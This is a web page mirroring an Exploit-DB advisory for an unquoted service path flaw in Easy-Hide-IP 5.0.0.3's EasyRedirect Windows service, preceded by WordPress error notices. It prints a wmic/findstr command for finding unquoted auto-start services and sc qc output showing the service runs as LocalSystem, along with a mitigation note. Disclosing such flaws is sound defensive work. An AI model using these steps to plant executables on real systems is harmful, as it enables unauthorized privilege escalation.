Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path - exploit.company
header-logo
Suggest Exploit
vendor:
Easy-Hide-IP
by:
Rene Cortes S
5.5
CVSS
MEDIUM
Unquoted Service Path
428
CWE
Product Name: Easy-Hide-IP
Affected Version From: 5.0.0.3
Affected Version To: 5.0.0.3
Patch Exists: NO
Related CWE:
CPE: a:easy-hide-ip:easy-hide-ip:5.0.0.3
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 Professional Service Pack 1
2019

Easy-Hide-IP 5.0.0.3 – ‘EasyRedirect’ Unquoted Service Path

The Easy-Hide-IP 5.0.0.3 software on Windows 7 Professional Service Pack 1 is vulnerable to an unquoted service path vulnerability. This vulnerability could allow an attacker to escalate privileges by placing a malicious executable in the search path of the service.

Mitigation:

To mitigate this vulnerability, the vendor should update the software to use a quoted service path. Users can also manually update the service path to include quotes.
Source

Exploit-DB raw data:

# Exploit Title: Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path
# Date: 2019-11-22
# Exploit Author: Rene Cortes S
# Vendor Homepage: https://easy-hide-ip.com
# Software Link: https://easy-hide-ip.com
# Version: 5.0.0.3
# Tested on: Windows 7 Professional Service Pack 1

##########################################################################################################################

Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

EasyRedirect		EasyRedirect	C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe	Auto


##############################################################################################################################################

Service info:

C:\Users\user>sc qc EasyRedirect
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: EasyRedirect
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe
        GRUPO_ORDEN_CARGA  : 
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : EasyRedirect
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem

#########################################################################################################################

Navigation

Suggest Exploit

Services By CQR

cqrsecured